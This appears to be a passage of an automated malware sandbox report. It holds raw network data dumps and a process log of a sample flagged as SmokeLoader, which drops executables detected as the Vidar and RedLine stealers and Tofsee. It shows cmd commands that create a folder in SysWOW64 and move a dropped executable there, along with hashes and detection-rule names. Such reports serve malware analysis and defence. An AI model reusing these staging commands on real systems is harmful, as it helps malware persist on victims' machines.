                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7454INData Raw: 72 ac b7 2b 07 4a c3 a6 1b 89 08 84 2c fc d8 95 80 4e f5 ec a6 f6 85 75 c1 1f 01 6c c1 b1 49 ef 53 f5 b9 88 f2 5c a3 f3 49 9f b0 ee 42 c2 b7 38 9b be c4 be 47 09 67 b0 e6 b0 76 3e 24 b4 5c 9d 9b 76 6f 9a 5b 00 18 de 71 4b f9 33 d2 9b d5 e3 d5 d8 b4 da 0f 0a 1d d6 e2 39 df 93 b8 e8 36 d2 82 1c cf 0f e4 f4 a4 8e 6e 19 04 4d d0 51 ba a1 91 d4 0e 3e d8 02 ca 55 f4 1d 8f 52 95 bb ef 76 8e 82 7a a9 32 04 e8 6c 7d 46 51 e7 a9 39 ce 56 2d 67 76 3c 06 e2 6b a4 4c 39 aa b7 19 f7 db c4 c1 3a ee 7c 1c b3 b8 9a cb c6 41 3b 8f f3 21 64 3f 5c 6c be a3 1c 05 94 c8 fc 01 55 3b 92 9c 9e 66 44 7f ed 38 16 95 5a a4 ca ac 12 f0 31 25 2a 73 a3 ad 13 e1 ea 23 78 fc 85 fb fc e9 42 9f 61 40 ed 2e 94 fd 9e e1 02 5d d7 a9 a8 83 72 9b 20 d2 a1 e6 30 69 6c 08 50 e3 29 c8 95 d1 0e 0a
                                                                                                                                                                                                    Data Ascii: r+J,NulIS\IB8Ggv>$\vo[qK396nMQ>URvz2l}FQ9V-gv<kL9:|A;!d?\lU;fD8Z1%*s#xBa@.]r 0ilP)
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7470INData Raw: f6 f0 8d ba 05 b6 58 6c e9 a7 8a 2f 3c 60 0e cd 83 e8 c4 1c e7 14 93 53 bb 19 bc ec aa c0 d2 2d 88 9d 99 62 84 54 c0 d1 22 cf a3 46 ec c9 3d 31 98 c5 07 24 62 51 c2 9c 05 ba 35 6e 4e 05 f0 8c bf 2f 1e 28 3e 6c 91 f2 8f 7a e9 87 62 1e 4e 8b 45 b7 5b 9f a5 9b a8 8c ac db 5d 45 b4 da 99 a6 7a ca 51 e1 40 f4 a2 3a 74 31 e9 f6 a9 59 62 15 58 10 54 38 a6 36 02 b9 72 cb 1a a4 4c ed 89 cc d2 8e 0f b9 48 f4 ba 7b 1c a6 d5 3f b3 2c ec 91 bd 30 88 5a a9 09 44 a7 a6 5c 51 a9 b7 42 67 f9 33 64 1b 5a 39 97 f6 d5 ee 9f 80 4c 4f 90 fb c2 88 ed 7c 98 8f 32 f4 2c 51 33 95 b2 c3 2b 43 88 0a 28 6c 54 e0 7b b9 ce 7a c3 a4 fc 52 c5 2c 04 69 12 ec da b8 51 67 92 ad 94 80 cd 22 28 01 43 c0 b7 fd 65 04 14 0d fc 50 e1 e6 c9 24 1b 30 a7 bb f1 80 76 cc 50 a1 97 d3 62 0f 3b e6 fe a4
                                                                                                                                                                                                    Data Ascii: Xl/<`S-bT"F=1$bQ5nN/(>lzbNE[]EzQ@:t1YbXT86rLH{?,0ZD\QBg3dZ9LO|2,Q3+C(lT{zR,iQg"(CeP$0vPb;
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7486INData Raw: 77 0b 33 62 be ec 62 68 89 4d bd 7e 2d b1 00 3e 44 1b f5 a4 03 d9 50 b1 33 95 bd d5 2d b9 11 f8 68 a6 ac 5a 22 66 ee 89 f1 4c 3b 30 9d 79 86 9d 3c f2 5b e3 33 b0 f0 a8 fa b9 27 6e f9 6f 41 bb 41 a2 a6 99 bb 5f 5e bd 0d ca f5 99 fc 3c e3 92 4c f4 87 b9 33 bd 84 e5 2e 4d b5 82 87 23 2b 25 64 ec 68 53 d7 61 52 da fc d4 fc 41 09 73 b5 d8 1e 4b 66 ba 4a 54 11 41 fd c8 fb 81 05 b3 15 da fc e4 8a 95 c3 5f 9b c3 b6 a4 4b fb f4 bd 8f 8d 5e 77 57 5a 1f ef 52 77 5c ce e5 c9 22 d6 97 74 39 6a ba 0f c3 f2 31 3a 79 46 ff ff fc b8 77 a0 8f 2e eb a7 cd 40 ca 14 03 2a 16 2f 92 3b df 42 b4 2b a6 13 9b c7 6f a4 6e b7 e8 05 14 3c 3f 3b d8 91 f1 3a d9 03 5b 2f ca 0c a5 de 2d f5 bb 99 b4 62 8c 66 0e 52 5c 79 49 e2 49 99 36 e6 e7 3b 05 64 57 fc df ff fa c6 67 29 f2 ca 18 96 c8
                                                                                                                                                                                                    Data Ascii: w3bbhM~->DP3-hZ"fL;0y<[3'noAA_^<L3.M#+%dhSaRAsKfJTA_K^wWZRw\"t9j1:yFw.@*/;B+on<?;:[/-bfR\yII6;dWg)
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7502INData Raw: 8e 02 64 7d a5 76 13 c0 a8 7d bc 57 12 e9 62 eb 14 7d a0 c9 bd 41 6a 4b 00 bc bc 83 4a 49 9e 1d b0 9d b2 21 81 03 6f c0 43 6e 66 02 63 57 3b 29 9c ed 4c b2 27 26 ac 24 9f 88 8f a2 62 0c 0b 2a 28 a0 6f d0 ff dc 12 90 f3 51 33 68 af 01 56 ca 54 27 19 3c 95 9a 77 6c 42 12 e1 31 fa 45 4d 28 24 1f 23 97 c8 77 11 f1 75 09 60 89 e9 24 6a 21 a0 a4 48 ed 66 c4 91 1c e4 bb 72 b8 cf 55 d6 d1 ca 68 21 45 dd e9 67 29 73 4b f0 1e 0a 9a 32 f3 74 cc bb dc 9b 58 af 40 91 f4 08 3a 91 8e d1 c5 1e 5e 01 74 94 24 65 9e 25 ca d5 61 45 05 ef ee c4 61 77 3d 2e 45 5a fa 6d bf 4f 81 f2 ce 79 5d 93 8b 47 06 4c a7 75 15 bc 20 37 0f da 7f fd 54 6b 8e 42 f1 5d 8e a7 3b 48 8a 8e 23 1a e2 86 83 52 9c 28 f1 22 7f 73 01 1e 43 f4 4d fd 74 1e f3 97 0d 10 bc 92 18 95 58 76 0b 19 0f 02 7c 86
                                                                                                                                                                                                    Data Ascii: d}v}Wb}AjKJI!oCnfcW;)L'&$b*(oQ3hVT'<wlB1EM($#wu`$j!HfrUh!Eg)sK2tX@:^t$e%aEaw=.EZmOy]GLu 7TkB];H#R("sCMtXv|
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7518INData Raw: 30 df 3b fa 23 8c 73 17 b7 8d c3 54 35 15 20 32 10 da 43 fd 86 44 d0 89 32 6c 67 fe aa 29 68 c5 30 e8 ee 3f ab 7f 6b ae 04 32 d0 39 f9 72 c1 a2 68 6a 2b 79 67 bb 9f aa 58 e7 33 d1 1c 98 5b 04 b0 5f 63 88 11 33 af ab 08 aa 19 fb be 9f 94 89 f1 50 be 7f a1 b3 88 fc 4d c0 f0 d1 b1 22 df 8a cf 0e 36 3e 9a 54 f6 5b 50 dd 4d 99 82 0c 55 15 38 1d a1 9d a6 71 37 e5 a5 00 78 2d 2e c7 4b a6 d2 c5 97 f1 e0 62 58 24 83 52 78 64 5e d4 1c 94 d6 6b d8 54 a1 a9 29 64 30 91 ce b1 a8 96 77 2a 79 95 eb 76 0b 20 7b d2 6b c6 ff e7 c6 3b fb ea ba e2 26 b6 c9 44 c5 5b 9b 01 b3 c6 cb ce 32 44 73 16 db eb c9 3a 72 6d 0f eb 08 e1 d6 c9 28 60 05 5a 87 db da 3c 95 b5 c2 cf 7c 96 65 e5 ff ef 24 0b 58 0a 3c 36 88 4b 27 df 3c 44 79 e1 c2 c2 55 7c b5 5b 1c cd 9d 04 aa d9 ae 6a 18 63 1e
                                                                                                                                                                                                    Data Ascii: 0;#sT5 2CD2lg)h0?k29rhj+ygX3[_c3PM"6>T[PMU8q7x-.KbX$Rxd^kT)d0w*yv {k;&D[2Ds:rm(`Z<|e$X<6K'<DyU|[jc


                                                                                                                                                                                                    Code Manipulations

                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:58:17
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Users\user\Desktop\eIxMVDoQF3.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\eIxMVDoQF3.exe"
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:320000 bytes
                                                                                                                                                                                                    MD5 hash:B45BF93A4B27690392433619C5006E8B
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:58:18
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Users\user\Desktop\eIxMVDoQF3.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\eIxMVDoQF3.exe"
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:320000 bytes
                                                                                                                                                                                                    MD5 hash:B45BF93A4B27690392433619C5006E8B
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.332260069.0000000000580000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.332377268.0000000001F51000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:58:19
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                    Imagebase:0x7ff70d6e0000
                                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:58:22
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                                                                                    Imagebase:0x7ff70d6e0000
                                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:58:22
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                                                                                    Imagebase:0x7ff70d6e0000
                                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:58:23
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                                                                    Imagebase:0x7ff70d6e0000
                                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:58:23
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                                                                    Imagebase:0x7ff70d6e0000
                                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:58:23
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                                                                                                                    Imagebase:0x7ff70d6e0000
                                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:58:24
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                                                                    Imagebase:0x7ff66e860000
                                                                                                                                                                                                    File size:163336 bytes
                                                                                                                                                                                                    MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:58:24
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                                                                                    Imagebase:0x7ff70d6e0000
                                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:58:25
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                    Imagebase:0x7ff720ea0000
                                                                                                                                                                                                    File size:3933184 bytes
                                                                                                                                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000000.318144404.0000000002E21000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:58:42
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                    Imagebase:0x7ff70d6e0000
                                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:58:55
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                    Imagebase:0x7ff70d6e0000
                                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:58:59
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\rwjfsvd
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\rwjfsvd
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:320000 bytes
                                                                                                                                                                                                    MD5 hash:B45BF93A4B27690392433619C5006E8B
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:59:01
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\rwjfsvd
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\rwjfsvd
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:320000 bytes
                                                                                                                                                                                                    MD5 hash:B45BF93A4B27690392433619C5006E8B
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.382566740.0000000000460000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.382707049.00000000004D1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:59:03
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\F805.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\F805.exe
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:301056 bytes
                                                                                                                                                                                                    MD5 hash:277680BD3182EB0940BC356FF4712BEF
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:59:04
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                    Imagebase:0x7ff70d6e0000
                                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:59:06
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                    Imagebase:0x7ff70d6e0000
                                                                                                                                                                                                    File size:51288 bytes
                                                                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:59:06
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6800 -ip 6800
                                                                                                                                                                                                    Imagebase:0x1250000
                                                                                                                                                                                                    File size:434592 bytes
                                                                                                                                                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:59:08
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6800 -s 520
                                                                                                                                                                                                    Imagebase:0x1250000
                                                                                                                                                                                                    File size:434592 bytes
                                                                                                                                                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:59:08
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\B50.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\B50.exe
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:323584 bytes
                                                                                                                                                                                                    MD5 hash:FF0D190D6DF636D7DE53B8B6B683BC6E
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.388045141.0000000000763000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000017.00000002.388045141.0000000000763000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:59:12
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\743F.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\743F.exe
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:320000 bytes
                                                                                                                                                                                                    MD5 hash:F05279062D67B1F816420725086C77AB
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000018.00000002.432619186.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000018.00000002.432841929.0000000000570000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000018.00000003.392346980.0000000000590000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:59:14
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\7D0A.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\7D0A.exe
                                                                                                                                                                                                    Imagebase:0xd70000
                                                                                                                                                                                                    File size:537088 bytes
                                                                                                                                                                                                    MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000019.00000002.437060463.0000000004361000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 46%, Metadefender, Browse
                                                                                                                                                                                                    • Detection: 89%, ReversingLabs

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:59:19
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\icpymrdv\
                                                                                                                                                                                                    Imagebase:0xd80000
                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:59:19
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff7f20f0000
                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:59:22
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tvdcssmj.exe" C:\Windows\SysWOW64\icpymrdv\
                                                                                                                                                                                                    Imagebase:0xd80000
                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:04:59:23
                                                                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff7f20f0000
                                                                                                                                                                                                    File size:625664 bytes
